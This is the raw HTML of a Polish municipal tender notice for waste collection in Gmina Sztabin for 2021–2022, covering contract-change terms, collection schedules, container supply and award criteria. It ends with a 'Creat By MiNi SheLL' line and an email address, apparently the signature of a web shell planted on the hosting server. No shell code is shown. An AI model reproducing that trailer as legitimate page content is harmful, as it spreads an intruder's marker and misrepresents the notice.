id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Umowa zawarta zostanie z uwzględnieniem postanowień wynikających z treści SIWZ oraz danych zawartych w ofercie. Postanowienia umowy zawarto we wzorze umowy, którą stanowi Załącznik nr 4 do SIWZ.1. Oprócz przypadków, o których mowa w art. 144 ust. 1 pkt 2-6 ustawy – Prawo zamówień publicznych, na podstawie art. 144 ust. 1 pkt 1 ustawy – Prawo zamówień publicznych, Zamawiający dopuszcza możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawierania umowy lub w przypadku wystąpienia którejkolwiek z następujących okoliczności:1)	Zmiana postanowień Umowy w stosunku do treści oferty Wykonawcy w zakresie wynagrodzenia, dopuszczalna jest w przypadku:	zmiany wysokości opłat wynikających wprost z przepisów prawa a mających istotny wpływ na koszty świadczenia usługi,	innej zmiany prawa powszechnie obowiązującego wpływającej na zasady odbierania odpadów,	wprowadzenia zmian w stosunku do Opisu Przedmiotu Zamówienia w zakresie wykonania prac niewykraczających poza zakres przedmiotu zamówienia, w sytuacji konieczności usprawnienia procesu realizacji zamówienia.2)	W związku z wskazanymi w ust. 1 okolicznościami, dopuszczalne jest zwiększenie wynagrodzenia, przy czym możliwe jest ono o kwotę nie większą niż udokumentowany wzrost kosztów świadczenia usługi.3)	Dopuszcza się zmianę umowy w zakresie sposobu spełniania przez Wykonawcę świadczenia odbierania odpadów w przypadku zmiany przepisów prawa powszechnie obowiązującego wpływających na sposób spełniania świadczenia4)	W przypadku zmiany stawki podatku od towarów i usług po zawarciu umowy, dla Stron wiążąca będzie stawka VAT obowiązująca w dniu wystawienia faktury, a zmiana kwoty ceny brutto z tego tytułu jest akceptowana przez Strony, bez konieczności składania dodatkowych oświadczeń.5)	Strony dopuszczają możliwość dokonywania zmian w Umowie spowodowanych zmianami powszechnie obowiązujących przepisów prawa, które zaczęły obowiązywać po dniu zawarcia Umowy, wraz ze skutkami wprowadzenia takiej zmiany, które mają wpływ na koszty wykonania przedmiotu Umowy. W trakcie trwania umowy Wykonawca zobowiązuje się do pisemnego powiadamiania Zamawiającego o:•	zmianie siedziby lub nazwy firmy,•	zmianie osób reprezentujących- przedstawicieli umowy,•	ogłoszeniu upadłości,•	ogłoszeniu likwidacji,•	zawieszenia działalności.2. Stosownie do treści art. 142 ust. 5 ustawy Pzp Zamawiający przewiduje możliwość zmiany wysokości wynagrodzenia określonego w § 7 umowy w następujących przypadkach: 1)	w przypadku zmiany stawki podatku od towarów i usług, 2)	w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonego na podstawie art. 2 ust. 3 –5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, 3)	w przypadku zmian zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub zmiany wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, 4)	w przypadku zmian zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych,- jeżeli zmiany określone w pkt 1-4 będą miały wpływ na koszty wykonania Umowy przez Wykonawcę. </span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-11-19</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Odbiór odpadów zmieszanych i segregowanych od właścicieli nieruchomości zamieszkałych.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zamówienie obejmuje: Odbiór odpadów komunalnych zmieszanych, gromadzonych przez mieszkańców w pojemnikach o pojemności min. 120 l oraz odbiór selektywnie zbieranych odpadów komunalnych gromadzonych przez mieszkańców w workach następujących frakcji odpadów: papier i tektura, tworzywa sztuczne, opakowania wielomateriałowe i metale, odpady opakowaniowe ze szkła, popiół, bioodpady stanowiące odpady komunalne, pozostałe odpady zbierane selektywnie tj.: zużyty sprzęt elektryczny i elektroniczny, meble i inne odpady wielkogabarytowe, zużyte opony, przeterminowane lekarstwa.Wykonawca zobowiązany jest do odbierania od właścicieli nieruchomości zamieszkałych każdej ilości zebranych odpadów komunalnych. Odbiór odpadów komunalnych winien odbywać się zgodnie z wytycznymi obowiązującego Wojewódzkiego Planu Gospodarki Odpadami dla Województwa Podlaskiego, obowiązującymi uchwałami Rady Gminy Sztabin tj. w sprawie uchwalenia regulaminu utrzymania czystości i porządku na terenie Gminy Sztabin, w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów oraz innymi aktami prawa krajowego lub miejscowego mogącymi mieć wpływ na realizację zamówienia. Instalacja Komunalna dla Gminy Sztabin to: Zakład Zagospodarowania Odpadów Komunalnych w Koszarówce ze Stacją Przeładunkową w Augustowie lub w Dąbrowie Białostockiej; Operator Instalacji, to BIOM sp. z o.o z siedzibą w Dolistowie Starym 144,19-124 Jaświły, Biuro Zarządu: Zabiele 37, 19-124 Jaświły, tel. 85 733 18 20, tel./fax 85 716 17 55. Odpady komunalne zebrane od właścicieli nieruchomości z terenu Gminy Sztabin należy przekazać do:Zakładu Zagospodarowania Odpadów w Koszarówce ze Stacją Przeładunkową w Augustowie lub Dąbrowie Białostockiej – odpady komunalne zmieszane, popiół zebrany selektywnie, odpady wielkogabarytowe, zużyte opony i odpady ulegające biodegradacji ze szczególnym uwzględnieniem bioodpadów;Zakładu Recyklingu w Dolistowie Starym – odpady komunalne selektywnie zebrane (papier i tektura, szkło, tworzywa sztuczne, metale, zużyte urządzenia elektryczne i elektroniczne, przeterminowane lekarstwa).W ramach realizacji Części 1 zamówienia, Wykonawca zobowiązany jest do zapewnienia i wyposażania nieruchomości, w których odbierane odpady komunalne gromadzone w sposób selektywny (wszystkich nieruchomości zamieszkałych), w kolorowe worki o pojemności 120 L z folii LDPE o grubości zapewniającej wytrzymałość worków, przeznaczone na gromadzenie odpadów segregowanych. Komplet worków składa się z: 1.	niebieskiego oznaczony napisem „Papier” – z przeznaczeniem na odpady z papieru, w tym tektury, odpady opakowaniowe z papieru, odpady opakowaniowe z tektury;2.	zielonego oznaczony napisem „Szkło” – z przeznaczeniem na odpady ze szkła, w tym odpady opakowaniowe ze szkła;3.	żółtego oznaczony napisem „Metale i tworzywa sztuczne” – z przeznaczeniem na odpady metali, w tym odpady opakowaniowe z metali, odpady tworzyw sztucznych, w tym odpady opakowaniowe z tworzyw sztucznych, oraz odpady opakowaniowe wielomateriałowe;4.	brązowego oznaczony napisem „Bio” – z przeznaczeniem na bioodpady stanowiące odpady komunalne; 5.	bezbarwnego oznaczony napisem „Popiół” – z przeznaczeniem na popiół pochodzący z palenisk domowych.Po każdorazowym odbiorze tych odpadów należy pozostawić worki w ilości odpowiadającej potrzebom właściciela nieruchomości w tym zakresie (cena worków wliczona w cenę oferty). Wykonawca zobowiązany jest do odbierania odpadów komunalnych według ustalonego harmonogramu bezpośrednio z terenu nieruchomości następujących frakcji odpadów komunalnych z następującą częstotliwością:Część 1 zamówienia:a)	Odpady zmieszane odbierane będą:	w okresie listopad – marzec: 1 raz w miesiącu,	w okresie kwiecień – październik: 1 raz na dwa tygodnie.b)	Odpady zmieszane z terenu nieruchomości Wspólnoty Mieszkaniowej będą odbierane:	w okresie listopad – marzec: 2 razy w miesiącu,	w okresie kwiecień – październik: 1 raz w tygodniu.c)	Odpady zbierane selektywnie: papier i tektura, szkło, tworzywa sztuczne, opakowania wielomateriałowe oraz odpady opakowaniowe ze szkła, metale odbierane będą:	z gospodarstw domowych – 1 raz w miesiącu,	z terenu Wspólnoty Mieszkaniowej – 2 razy w miesiącu.d)	bioodpady stanowiące odpady komunalne – w okresie listopad - marzec 1 raz w miesiącu, a w okresie od kwietnia do października 1 raz na dwa tygodnie i jeden raz w tygodniu z budynków Wspólnoty Mieszkaniowej,e)	zbierany selektywnie popiół: – dla Wspólnoty Mieszkaniowej co najmniej 2 razy w roku,	w sezonie grzewczym dla gospodarstw domowych tj. od 1 października do 30 kwietnia – 1 raz w miesiącu 	poza sezonem grzewczym dla gospodarstw domowych – jeden raz w lipcu, f)	pozostałe odpady zbierane selektywnie tj.:	zużyty sprzęt elektryczny i elektroniczny, baterie	meble i inne odpady wielkogabarytowe,	zużyte opony	przeterminowane lekarstwajeden raz w roku.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>90500000-2, 90511000-2, 90513100-7, 90512000-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-01<br/>data zakończenia: 2022-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności faktury</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Odbiór i zagospodarowanie odpadów zmieszanych i segregowanych z terenów i obiektów komunalnych zarządzanych przez Gminę Sztabin ( urząd gminy, szkoły, place, przystanki autobusowe, świetlice, remizy itp.) </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zamówienie obejmuje: Odbiór i zagospodarowanie odpadów komunalnych zmieszanych i segregowanych z terenów i obiektów komunalnych zarządzanych przez Gminę Sztabin (urząd gminy, szkoły, place, przystanki autobusowe, świetlice, remizy itp.) – Część 2 zamówienia. W zakresie Części 2, odpady komunalne będą segregowane przy szkołach podstawowych w Sztabinie, Krasnymborze i Jaminach oraz przy budynku urzędu gminy w Sztabinie. Odpady segregowane będą gromadzone w pojemnikach o poj. 1100 l dla następujących frakcji odpadów:	papier i tektura,	tworzywa sztuczne, opakowania wielomateriałowe i metale,	odpady opakowaniowe ze szkła.W ramach realizacji Części 2 zamówienia, Wykonawca udostępni z dniem 1 stycznia 2021 roku Urzędowi Gminy Sztabin, bez ponoszenia przez Zamawiającego z tego tytułu żadnych kosztów, następujące rodzaje pojemników, z których odbierane będą zmieszane odpady komunalne:	30 pojemników PA.1.1 o pojemności 1100 litrów,	10 pojemników MGB-120 o pojemności 120 litrów,z których:	15 pojemników PA.1.1 zostanie ustawionych na trzech placach (parkingach) zlokalizowanych we wsiach Sztabin, Jaminy i Krasnybór (po 5 pojemników w każdej miejscowości), 	15 pojemników PA.1.1 zostanie ustawionych przy dwóch szkołach (Sztabin, Krasnybór), przedszkolu w Sztabinie, przy Urzędzie Gminy w Sztabinie, Gminnym Ośrodku Pomocy Społecznej w Sztabinie i plaży w Sztabinie,	10 pojemników MGB-120 zostanie ustawionych przy Centrum Biblioteczno – Kulturalnym w Sztabinie, , remizach OSP i świetlicach wiejskich w Jagłowie, Jaminach, Jastrzębnej Pierwszej, Jaziewie, Krasnymborze, Mogilnicach, Polkowie, Sztabinie, Jastrzębnej Drugiej. W ramach realizacji Części 2 zamówienia Wykonawca udostępni z dniem 1 stycznia 2021 roku Urzędowi Gminy Sztabin, bez ponoszenia przez Zamawiającego z tego tytułu żadnych dodatkowych kosztów, następujące rodzaje pojemników, z których odbierane będą segregowane odpady komunalne: 15 pojemników PA.1.1 o pojemności 1100 litrów, w tym: 	4 szt. na szkło, 	4 szt. na papier,	7 szt. na tworzywa sztuczne. Pojemniki te będą ustawione przy dwóch szkołach (Sztabin, Krasnybór) oraz Urzędzie Gminy w Sztabinie. Wykonawca udostępni z dniem 1 stycznia 2021 roku dla Wspólnoty Mieszkaniowej w Sztabinie na podstawie umowy wynajmu, dzierżawy lub innej formy dysponowania pojemnikami, bez ponoszenia przez Zamawiającego z tego tytułu żadnych kosztów następujące rodzaje pojemników, z których odbierane będą odpady komunalne:	pojemniki do gromadzenia popiołu (dotychczas był to pojemnik KP-7) – dotyczy Części 2,	pojemniki z tworzywa sztucznego oznaczone odpowiednimi kolorami w stosunku do każdego rodzaju odpadu selektywnie zbieranego, o pojemności 1100 l (litrów) do następujących odpadów (dotyczy Części 2) : 	szkło, 	papier i tektura,	tworzywa sztuczne, metale drobne, opakowania wielomateriałowe,	bioodpady stanowiące odpady komunalne.Harmonogram odbioru odpadów:Odbiór i zagospodarowanie odpadów komunalnych zmieszanych i segregowanych z terenów i obiektów komunalnych zarządzanych przez Gminę Sztabin;a)	odpady zmieszane z budynku Urzędu Gminy w Sztabinie, szkół podstawowych oraz z plaży w Sztabinie – 2 razy w miesiącu.b)	odpady segregowane z budynku Urzędu Gminy w Sztabinie, szkół podstawowych – 2 razy w miesiącu.c)	odpady zmieszane z pojemników ustawionych na placach – 2 razy w miesiącu (dopuszcza się możliwość częstszego odbioru odpadów) d)	odpady zmieszane z pozostałych obiektów – 1 raz w miesiącu<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>90500000-2, 90511000-2, 90512000-9, 90513100-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-01<br/>data zakończenia: 2022-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności faktury</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com